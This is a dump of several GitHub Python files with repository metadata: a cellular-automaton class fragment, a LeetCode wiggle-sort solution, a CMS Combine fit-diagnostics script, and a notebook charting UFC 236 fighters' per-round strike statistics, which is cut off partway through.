DEFAULT_RADIUS = 100
#---------------------------------------------------------------------------
# functions
#---------------------------------------------------------------------------
#
#---------------------------------------------------------------------------
## constructor
def __init__(self, rule, radius=DEFAULT_RADIUS, metrics=[]):
self.radius = radius
self.rule = rule
self.diameter = radius * 2 + 1
self.size = self.diameter**2
self.reset()
self.metrics = [Metric(self) for Metric in metrics]
# end function
#---------------------------------------------------------------------------
## resets the world to its initial state.
def reset(self):
# big bang initial conditions
self.time = 0
self.cells = np.zeros((self.diameter, self.diameter), dtype=int) # TODO type affects performace?
self.cells[self.radius, self.radius] = 1
# matrix with indices into rule array of last tick
self.trans_idx = None
# statistics
self.tick_stat = TimingStat()
# end function
#---------------------------------------------------------------------------
## advances the world to its next state.
def tick(self):
self.tick_stat.start()
# apply the rule
self.cells, self.trans_idx = self.rule.apply(self.cells)
# advance time
self.time += 1
self.tick_stat.stop()
# end function
#---------------------------------------------------------------------------
## advances the world over multiple states.
def advance(self, ticks=1, silent=False):
# execute specified number of ticks
while ticks > 0:
self.tick()
ticks -= 1
# periodically update status
if self.time % 1000 == 0 or ticks == 0:
# calculate metrics
for m in self.metrics:
m.update()
# output status
if not silent:
print(self)
# end if
# end if
# end if
# end function
# get hash of the current cell configuration
def hash(self):
h = hash(self.cells.tostring())
# ensure h is nonnegative
h %= (sys.maxsize + 1) * 2
return "%016x" % h
# end function
#---------------------------------------------------------------------------
## returns the current number of cells of each state
def get_population(self):
return np.unique(self.cells, return_counts=True)[1] / self.cells.size
# end function
def __str__(self):
return ("[tick %d] " % self.time) + ", ".join(map(str, self.metrics))
# end function
# end class
#-------------------------------------------------------------------------------
# end of file
| [
"dapaulid@gmail.com"
] | dapaulid@gmail.com |
fb47a23ad30dfd0ef95a58c450969c5796386e1e | d83f50302702d6bf46c266b8117514c6d2e5d863 | /wiggle-sort-ii.py | 4e805ab4c2cb628a233a145c8732759446925784 | [] | no_license | sfdye/leetcode | 19764a6bdb82de114a2c82986864b1b2210c6d90 | afc686acdda4168f4384e13fb730e17f4bdcd553 | refs/heads/master | 2020-03-20T07:58:52.128062 | 2019-05-05T08:10:41 | 2019-05-05T08:10:41 | 137,295,892 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | class Solution:
def wiggleSort(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
for i, num in enumerate(sorted(nums)[::-1]):
nums[(i * 2 + 1) % (len(nums) | 1)] = num
| [
"tsfdye@gmail.com"
] | tsfdye@gmail.com |
a3f237e9944a7da0d2641a690d8c8a7b759a9236 | 5d93d415c50b5e7084eed8ebb23781745d744524 | /runStatisticsChecksUnblinded.py | 17122e4df29ec94ea5e8873a882a8bff3126d236 | [] | no_license | tanmaymudholkar/STEALTH | f32cae991ee6714e22b062c66fc0c6edc794b042 | 5bd797f4e432b0b3a08f157f4fe1c94391243af4 | refs/heads/master | 2023-07-19T08:18:20.475132 | 2023-07-08T04:07:13 | 2023-07-08T04:07:13 | 107,295,543 | 0 | 1 | null | 2017-10-17T16:28:32 | 2017-10-17T16:28:32 | null | UTF-8 | Python | false | false | 5,866 | py | #!/usr/bin/env python
from __future__ import print_function, division
import os, sys, argparse, subprocess, math
import ROOT
import stealthEnv, commonFunctions
ROOT.gROOT.SetBatch(ROOT.kTRUE)
ROOT.TH1.AddDirectory(ROOT.kFALSE)
inputArgumentsParser = argparse.ArgumentParser(description='Plot impacts of each nuisance parameter given a datacard.')
inputArgumentsParser.add_argument('--outputFolder', required=True, help='Path to folder in which to store output files.',type=str)
inputArgumentsParser.add_argument('--datacardTemplateParentFolderWithPrefix', required=True, help='Path to EOS folder (including xrootd prefix) from which to fetch datacard.',type=str)
inputArgumentsParser.add_argument('--datacardTemplateFileName', required=True, help='Name of datacard.',type=str)
inputArgumentsParser.add_argument('--identifier', required=True, help='Human-readable ID for the output.',type=str)
inputArguments = inputArgumentsParser.parse_args()
# If "identifier" contains anything other than a letter from the alphabet, it can't be used in a TeX macro
if not((inputArguments.identifier).isalpha()): sys.exit("ERROR: argument \"identifier\" can only contain letters.")
output_folder = "{oF}/{i}".format(oF=inputArguments.outputFolder, i=inputArguments.identifier)
# Make sure output folder exists
if not(os.path.isdir(output_folder)): subprocess.check_call("mkdir -p {oF}".format(oF=output_folder), shell=True, executable="/bin/bash")
# Step 1: Copy datacard locally
stealthEnv.execute_in_env(commandToRun="cd {oF} && xrdcp --nopbar --force --path {iF}/{f} {f}".format(oF=output_folder, iF=inputArguments.datacardTemplateParentFolderWithPrefix, f=inputArguments.datacardTemplateFileName))
# Need to add the line "shapes * * FAKE" to "fake" a shape analysis, because that is required by the FitDiagnostics tool
stealthEnv.execute_in_env(commandToRun="cd {oF} && sed -i '/number of nuisance parameters/a shapes * * FAKE' {f}".format(oF=output_folder, f=inputArguments.datacardTemplateFileName))
# Step 2: Run FitDiagnostics
stealthEnv.execute_in_env(commandToRun="cd {oF} && combine -M FitDiagnostics --robustFit 1 --rMin -10 --expectSignal 0 --saveShapes --saveWithUncertainties --plots -d {f}".format(oF=output_folder, f=inputArguments.datacardTemplateFileName))
# Step 3: Get best-fit value of r and write it out to a TeX file
r_bestfit, r_error_lo, r_error_hi = commonFunctions.get_r_from_fit_diagnostics_output(input_file_path="{oF}/fitDiagnostics.root".format(oF=output_folder), printDebug=False)
output_tex_file_r_bestfit = open("{oF}/r_best_fit_{i}.tex".format(oF=output_folder, i=inputArguments.identifier), 'w')
output_tex_file_r_bestfit.write("\\providecommand{{\\BestFitR{i}}}{{Best fit $r$: {r_bestfit:.4G}~~-{r_error_lo:.3f}/+{r_error_hi:.3f}~~(68\\% CL)}}\n".format(i=inputArguments.identifier, r_bestfit=r_bestfit, r_error_lo=r_error_lo, r_error_hi=r_error_hi))
output_tex_file_r_bestfit.close()
# Step 4: Get pulls of nuisances using the standard "diffNuisances.py" script
stealthEnv.execute_in_env(commandToRun="cd {oF} && python ${{CMSSW_BASE}}/src/HiggsAnalysis/CombinedLimit/test/diffNuisances.py -a fitDiagnostics.root > {oF}/diffNuisances_{i}_raw.txt 2>&1".format(oF=output_folder, i=inputArguments.identifier))
# Step 5: Write out output of diffNuisances verbatim into a TeX file
commonFunctions.write_diffNuisances_output_into_tex_file(input_file_path="{oF}/diffNuisances_{i}_raw.txt".format(oF=output_folder, i=inputArguments.identifier), output_file_path="{oF}/diffNuisances_{i}.tex".format(oF=output_folder, i=inputArguments.identifier))
# Step 6: Create Combine workspace from datacard
stealthEnv.execute_in_env(commandToRun="cd {oF} && text2workspace.py {f} -m 125".format(oF=output_folder, f=inputArguments.datacardTemplateFileName))
workspace_path = "{oF}/{f}".format(oF=output_folder, f=(inputArguments.datacardTemplateFileName).replace(".txt", ".root"))
print("Produced workspace at: {w}".format(w=workspace_path))
if not(os.path.exists(workspace_path)): sys.exit("ERROR: expected to find file at location {w}, but found none.".format(w=workspace_path))
# Step 7: do initial fit to parameters of interest (just signal strength in our case) with --doInitialFit
stealthEnv.execute_in_env(commandToRun="cd {oF} && combineTool.py -M Impacts -d {w} -m 125 --doInitialFit --robustFit 1 --expectSignal 0 --rMin -10".format(oF=output_folder, w=workspace_path))
# Step 8: fit for each nuisance parameter with --doFits
stealthEnv.execute_in_env(commandToRun="cd {oF} && combineTool.py -M Impacts -d {w} -m 125 --robustFit 1 --doFits --expectSignal 0 --rMin -10 --parallel 12".format(oF=output_folder, w=workspace_path))
# Step 9: Collate outputs and write impacts into a json file
stealthEnv.execute_in_env(commandToRun="cd {oF} && combineTool.py -M Impacts -d {w} -m 125 --expectSignal 0 --rMin -10 -o impacts.json".format(oF=output_folder, w=workspace_path))
# Step 10: Make the impact plots
stealthEnv.execute_in_env(commandToRun="cd {oF} && plotImpacts.py -i impacts.json -o impacts_{i} --label-size 0.04 --left-margin 0.55 --height 500 --per-page 21".format(oF=output_folder, i=inputArguments.identifier))
# Step 11: Rerun FitDiagnostics with extra plots
stealthEnv.execute_in_env(commandToRun="cd {oF} && combine -M FitDiagnostics --robustFit 1 --rMin -10 --expectSignal 0 --saveWithUncertainties --saveOverallShapes --numToysForShapes 200 --plots -d {f}".format(oF=output_folder, f=inputArguments.datacardTemplateFileName))
# Step 12: Save high-res versions of 2D correlation plots, and print important values
commonFunctions.print_and_save_high_res_correlations(input_file_path="{oF}/fitDiagnostics.root".format(oF=output_folder), output_folder=output_folder, suffix=inputArguments.identifier, list_correlations_to_save=["correlation_b", "correlation_s", "correlation_bins_b", "correlation_bins_s"])
print("All done!")
| [
"tkmudholkar@gmail.com"
] | tkmudholkar@gmail.com |
79752c6d98e09fffc733bd35034d18f7c28d8349 | 9251e4c4a2c683a3c09592fc51bb946fdd80f024 | /UFCTrainingStats (1).py | 73e50ad5171fc58029cf814471d64f938c551f22 | [] | no_license | sparkey667/AnalyzingUFCStatsforUFC236 | 8bc6e87cd74433bb5a88a7fc35644f080423ddb5 | 4354028c23be90d94cdb722c459af20a6f9dcdc8 | refs/heads/master | 2020-05-07T20:29:59.269492 | 2019-04-18T15:24:32 | 2019-04-18T15:24:32 | 180,863,771 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55,223 | py | #!/usr/bin/env python
# coding: utf-8
# Name = "Dheric Seney"
# # UFC Statistics for Training
#
# https://www.itbusiness.ca/news/former-ufc-fighter-says-data-analytics-should-be-used-in-mma/77375
#
# Data Analytics is not used a lot in UFC. Most fighters are training for their strengths and not necessary to defeat their opponent. Using Data Science / Data Analytics, fighters could train certain styles / techniques in order to get an upper hand against their opponent
#
# Objective: Based on the fighters who will be fighting in UFC: 236, I will analyze each fighter's past fights and predict what they will do in the incoming PPV event
# The Data set that was retrieved for this project was from http://ufcstats.com/statistics/events/completed
# The data includeds:
# - 10 fighters fighting in the Main Card of UFC 236
# - 5 rounds of Data
# - if the fight did not last 5 rounds because it was a 3 round fight or a fighter was KO'd or submitted, 0's were placed for the rounds
# - Attempts of Significant Strikes (Head, body, leg, distance, ground, clinch)
# - Lands of Significant Stikes (Head, body, leg, distance, ground, clinch)
# In[1]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
file = pd.read_csv('UFC_Rounds(extra).csv')
# In[2]:
# set up csv file to jupyter and checks to see if there is stuff
print(file.columns)
# print(file.tail(17))
# print(pd.DataFrame(file))
# file.iloc[49:]
# In[3]:
# file = file.drop(file.iloc[49:],axis=0)
file = file[:-17]
print(file)
# # Main Card
#
# The main card: (wins-losses-draws)
#
# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0)
# Kelvin Gastelum (16-3-0) vs Israel Adesanya (16-0-0)
# Eryk Anders (11-3-0) vs Khalil Rountree Jr. (7-3-0)
# Alan Jouban (16-6-0) vs Dwight Grant (9-2-0)
# Ovince Saint Preux (23-12-0) vs Nikita Krylov (24-6-0)
#
#
# getFighterStats() takes an input of the fighter name and the file name. It returns a list/ dataframe of the previous fights the fighter was in and the stats from them
# In[4]:
def getFighterStats(name,file):
fighter = file[file['Name'] == name]
return fighter
# In[5]:
# Set's tables for each fighter
Holloway = getFighterStats('Max Holloway', file)
Poirier = getFighterStats('Dustin Poirier', file)
Gastelum = getFighterStats('Kelvin Gastelum',file)
Adesanya = getFighterStats('Israel Adesanya',file)
Anders = getFighterStats('Eryk Anders',file)
RountreeJr = getFighterStats('Khalil Rountree Jr.',file)
Jouban = getFighterStats('Alan Jouban',file)
Grant = getFighterStats('Dwight Grant',file)
Preux = getFighterStats('Saint Preux',file)
Krylov = getFighterStats('Nikita Krylov',file)
# In[6]:
print(Holloway)
print(Poirier)
print(Gastelum)
print(Adesanya)
print(Anders)
print(RountreeJr)
print(Jouban)
print(Grant)
print(Preux)
print(Krylov)
# type(Poirier)
# GetRoundStats()
# - Input: takes two inputts: he fighter's previous fights and stats variable created from getFighterStats() and the specific round that you want the stats for
# - Purpose: Takes the mean for each column so its one row
# - Output: outputs the row of stats for the specified round
# In[7]:
def getRoundStats(name,r):
if r == 1:
roundOne = name[name.columns[3:15]]
stats1 = np.mean(roundOne)
return pd.DataFrame(stats1)
elif r == 2:
roundTwo = name[name.columns[15:27]]
stats2 = np.mean(roundTwo)
return pd.DataFrame(stats2)
elif r == 3:
roundThree = name[name.columns[27:39]]
stats3 = np.mean(roundThree)
return pd.DataFrame(stats3)
elif r == 4:
roundFour = name[name.columns[39:51]]
stats4 = np.mean(roundFour)
return pd.DataFrame(stats4)
elif r == 5:
roundFive = name[name.columns[51::]]
stats5 = np.mean(roundFive)
return pd.DataFrame(stats5)
else:
return 'choose a round between 1 to 5'
# category()
# - input: Takes two variables. The name of the Fighter and the specific stat needed
# - n = normal
# - d = distance
# - c = clinch
# - g = ground
# - Purpose: takes the sum of the columns for the specific categorical stat needed. The calculation is done on landed not attempts
# - Output: returns the total number for the categorical stat
# In[8]:
def category(name,stat):
if stat == 'n':
return np.sum(name[0][1:6:2]).round(1)
elif stat == 'd':
return np.sum(name[0][7:8:2])
elif stat == 'c':
return np.sum(name[0][9:10:2])
elif stat == 'g':
return np.sum(name[0][11::2])
else:
return 'wrong stat'
# In[9]:
H_stats = getRoundStats(Holloway,3)
print(H_stats)
# H_stats[0][9:11:2]
category(H_stats,'g')
# clinch = getClinch(H_stats,1)
# print("total", clinch)
# distance = getDistance(H_stats,1)
# print("total", distance)
# ground = getGround(H_stats,1)
# print("total", ground,)
# normal = getNormal(H_stats,1)
# print("total", normal)
# In[10]:
# labels = 'Clinch','Distance','Ground','Normal'
# sizes = [getClinch(getRoundStats(Holloway,1),1), getDistance(getRoundStats(Holloway,1),1), getGround(getRoundStats(Holloway,1),1), getNormal(getRoundStats(Holloway,1),1)]
# colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
# explode = (0, 0, 0, 0)
# # Plot
# plt.pie(sizes, explode=explode, labels=labels, colors=colors,
# autopct='%1.1f%%', shadow=True, startangle=140)
# plt.axis('equal')
# plt.show()
# # Stats per round
#
# This section finds specific stats per each fighter per round. After getting the stats, the stats are placed in a pie chart so a fighter can use this data to know what their opponent is most likely going to do.
#
# The rounds calculated are rounds 1, 2, 3. Rounds 4 and 5 were left out due to not all fighters making it to 5 rounds.
# # Round 1
# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0) : Round 1
# In[11]:
plt.subplot(221)
plt.title('Max Holloway Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Holloway,1),'n'),category(getRoundStats(Holloway,1),'c'),category(getRoundStats(Holloway,1),'d'),category(getRoundStats(Holloway,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dustin Poirier Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Poirier,1),'n'),category(getRoundStats(Poirier,1),'c'),category(getRoundStats(Poirier ,1),'d'),category(getRoundStats(Poirier ,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Kelvin Gastelum (16-3-0) vs Israel Adesanya (16-0-0) : Round 1
# In[12]:
plt.subplot(221)
plt.title('Kelvin Gastelum Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Gastelum,1),'n'),category(getRoundStats(Gastelum,1),'c'),category(getRoundStats(Gastelum,1),'d'),category(getRoundStats(Gastelum,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Israel Adesanya Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Adesanya ,1),'n'),category(getRoundStats(Adesanya ,1),'c'),category(getRoundStats(Adesanya ,1),'d'),category(getRoundStats(Adesanya,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Eryk Anders (11-3-0) vs Khalil Rountree Jr. (7-3-0) : Round 1
# In[13]:
plt.subplot(221)
plt.title('Eryk Anders Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Anders,1),'n'),category(getRoundStats(Anders,1),'c'),category(getRoundStats(Anders,1),'d'),category(getRoundStats(Anders,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Khalil Rountree Jr Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(RountreeJr,1),'n'),category(getRoundStats(RountreeJr,1),'c'),category(getRoundStats(RountreeJr,1),'d'),category(getRoundStats(RountreeJr ,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Alan Jouban (16-6-0) vs Dwight Grant (9-2-0) : Round 1
# In[14]:
plt.subplot(221)
plt.title('Alan Jouban Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Jouban,1),'n'),category(getRoundStats(Jouban,1),'c'),category(getRoundStats(Jouban,1),'d'),category(getRoundStats(Jouban,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dwight Grant Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Grant,1),'n'),category(getRoundStats(Grant,1),'c'),category(getRoundStats(Grant,1),'d'),category(getRoundStats(Grant,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Ovince Saint Preux (23-12-0) vs Nikita Krylov (24-6-0) : Round 1
# In[15]:
plt.subplot(221)
plt.title('Ovince Saint Preux Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Preux,1),'n'),category(getRoundStats(Preux,1),'c'),category(getRoundStats(Preux,1),'d'),category(getRoundStats(Preux,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Nikita Krylov Round 1')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Krylov,1),'n'),category(getRoundStats(Krylov,1),'d'),category(getRoundStats(Krylov,1),'c'),category(getRoundStats(Krylov,1),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# # Round 2
# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0) : Round 2
# In[16]:
plt.subplot(221)
plt.title('Max Holloway Round 2')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Holloway,2),'n'),category(getRoundStats(Holloway,2),'c'),category(getRoundStats(Holloway,2),'d'),category(getRoundStats(Holloway,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dustin Poirier Round 2')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Poirier,2),'n'),category(getRoundStats(Poirier,2),'c'),category(getRoundStats(Poirier ,2),'d'),category(getRoundStats(Poirier ,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Kelvin Gastelum (16-3-0) vs Israel Adesanya (16-0-0) : Round 2
# In[17]:
plt.subplot(221)
plt.title('Kelvin Gastelum Round 2')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Gastelum,2),'n'),category(getRoundStats(Gastelum,2),'c'),category(getRoundStats(Gastelum,2),'d'),category(getRoundStats(Gastelum,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Israel Adesanya Round 2')
labels ='Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Adesanya ,2),'n'),category(getRoundStats(Adesanya ,2),'c'),category(getRoundStats(Adesanya ,2),'d'),category(getRoundStats(Adesanya,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Eryk Anders (11-3-0) vs Khalil Rountree Jr. (7-3-0) : Round 2
# In[18]:
plt.subplot(221)
plt.title('Eryk Anders Round 2')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Anders,2),'n'),category(getRoundStats(Anders,2),'c'),category(getRoundStats(Anders,2),'d'),category(getRoundStats(Anders,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Khalil Rountree Jr Round 2')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(RountreeJr,2),'n'),category(getRoundStats(RountreeJr,2),'c'),category(getRoundStats(RountreeJr,2),'d'),category(getRoundStats(RountreeJr ,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Alan Jouban (16-6-0) vs Dwight Grant (9-2-0) : Round 2
# In[19]:
plt.subplot(221)
plt.title('Alan Jouban Round 2')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Jouban,2),'n'),category(getRoundStats(Jouban,2),'c'),category(getRoundStats(Jouban,2),'d'),category(getRoundStats(Jouban,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dwight Grant Round 2')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Grant,2),'n'),category(getRoundStats(Grant,2),'c'),category(getRoundStats(Grant,2),'d'),category(getRoundStats(Grant,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Ovince Saint Preux (23-12-0) vs Nikita Krylov (24-6-0) : Round 2
# In[20]:
plt.subplot(221)
plt.title('Ovince Saint Preux Round 2')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Preux,2),'n'),category(getRoundStats(Preux,2),'c'),category(getRoundStats(Preux,2),'d'),category(getRoundStats(Preux,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Nikita Krylov Round 2')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Krylov,2),'n'),category(getRoundStats(Krylov,2),'c'),category(getRoundStats(Krylov,2),'d'),category(getRoundStats(Krylov,2),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# # Round 3
# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0) : Round 3
# In[21]:
plt.subplot(221)
plt.title('Max Holloway Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Holloway,3),'n'),category(getRoundStats(Holloway,3),'c'),category(getRoundStats(Holloway,3),'d'),category(getRoundStats(Holloway,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dustin Poirier Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Poirier,3),'n'),category(getRoundStats(Poirier,3),'c'),category(getRoundStats(Poirier ,3),'d'),category(getRoundStats(Poirier ,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Kelvin Gastelum (16-3-0) vs Israel Adesanya (16-0-0) : Round 3
# In[22]:
plt.subplot(221)
plt.title('Kelvin Gastelum Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Gastelum,3),'n'),category(getRoundStats(Gastelum,3),'c'),category(getRoundStats(Gastelum,3),'d'),category(getRoundStats(Gastelum,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Israel Adesanya Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Adesanya ,3),'n'),category(getRoundStats(Adesanya ,3),'c'),category(getRoundStats(Adesanya ,3),'d'),category(getRoundStats(Adesanya,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Eryk Anders (11-3-0) vs Khalil Rountree Jr. (7-3-0) : Round 3
# In[23]:
plt.subplot(221)
plt.title('Eryk Anders Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Anders,3),'n'),category(getRoundStats(Anders,3),'c'),category(getRoundStats(Anders,3),'d'),category(getRoundStats(Anders,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Khalil Rountree Jr Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(RountreeJr,3),'n'),category(getRoundStats(RountreeJr,3),'c'),category(getRoundStats(RountreeJr,3),'d'),category(getRoundStats(RountreeJr ,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Alan Jouban (16-6-0) vs Dwight Grant (9-2-0) : Round 3
# In[24]:
plt.subplot(221)
plt.title('Alan Jouban Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Jouban,3),'n'),category(getRoundStats(Jouban,3),'c'),category(getRoundStats(Jouban,3),'d'),category(getRoundStats(Jouban,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
